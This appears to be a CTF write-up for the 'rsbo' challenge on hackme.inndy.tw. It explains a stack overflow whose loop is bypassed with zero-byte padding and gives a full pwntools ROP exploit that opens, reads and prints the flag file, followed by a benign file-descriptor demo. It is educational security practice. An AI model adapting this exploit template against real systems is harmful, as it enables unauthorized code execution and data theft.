
rsbo

D4rk3r
2018.09.09 15:44 Word count: 142
Protections
main function

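There is a stack overflow that allows ROP, but the for loop below it corrupts the ROP chain. Only after reading charlie's writeup did I learn that sending 108 \x00 bytes here works: when the overwrite reaches v8, its value becomes 0, so the for loop exits and the ROP chain that follows is not affected. After that, ROP with the open, read and write functions is enough. Note that fd = 0 is standard input (stdin), 1 is standard output (stdout), 2 is standard error (stderr), and 3~9 are opened files.

Full exploit: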

from pwn import *
#context.log_level = 'debug'

#p = process('./rsbo',env = {"LD_PRELOAD":"../libc-2.23.so.i386"})
p = remote('hackme.inndy.tw',7706)
elf = ELF('./rsbo')

write_plt = elf.plt['write']
open_plt = elf.plt['open']
read_plt = elf.plt['read']
start_addr = elf.symbols["_start"]
flag_addr = 0x080487D0
bss_addr = elf.bss()

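# Each stage pads with 108 zero bytes: this sets v8 to 0 so the for loop
# exits without corrupting the chain. The first two stages return to _start
# so the overflow can be triggered again for the next call.

#open('/home/ctf/flag',0)
payload = b'\x00'*108 + p32(open_plt)
payload += p32(start_addr) + p32(flag_addr) + p32(0)
p.send(payload)

#read(3,bss,0x60): 3 is the descriptor returned by the open() above
payload = b'\x00'*108 + p32(read_plt)
payload += p32(start_addr) + p32(3) + p32(bss_addr) + p32(0x60)
p.send(payload)

#write(1,bss,0x60): last stage, so the return address is just filler
payload = b'\x00'*108 + p32(write_plt) + b'aaaa'
payload += p32(1) + p32(bss_addr) + p32(0x60)
p.send(payload)

flag = p.recvuntil(b'}')
print(flag)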

p.close()
#p.interactive()
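The chain passes 3 to read because open returns the lowest descriptor number not currently in use, and a process that holds only stdin, stdout and stderr has 0, 1 and 2 taken. The following is an added example, not part of the original post, that shows this allocation rule; the function names are hypothetical and it opens only os.devnull.

```python
import os
import subprocess
import sys


def fd_allocation_demo():
    """Open /dev/null three times and return (first, second, reused).

    'reused' is opened after 'first' has been closed, so the kernel hands
    the same number out again: open() always picks the lowest free slot.
    """
    first = os.open(os.devnull, os.O_RDONLY)
    second = os.open(os.devnull, os.O_RDONLY)
    os.close(first)
    reused = os.open(os.devnull, os.O_RDONLY)
    os.close(second)
    os.close(reused)
    return first, second, reused


def first_fd_in_fresh_process():
    """Return the descriptor a new process gets from its first open().

    The child inherits only 0, 1 and 2 (subprocess closes everything else
    by default), which matches the situation the write-up relies on.
    """
    child_code = "import os; print(os.open(os.devnull, os.O_RDONLY))"
    result = subprocess.run(
        [sys.executable, "-c", child_code],
        stdin=subprocess.DEVNULL,
        capture_output=True,
        text=True,
        check=True,
    )
    return int(result.stdout.strip())


if __name__ == "__main__":
    print("first, second, reused:", fd_allocation_demo())
    print("first open() in a fresh process:", first_fd_in_fresh_process())
```

A hardcoded descriptor number therefore holds only while the target has nothing else open; any extra open file or socket shifts the value.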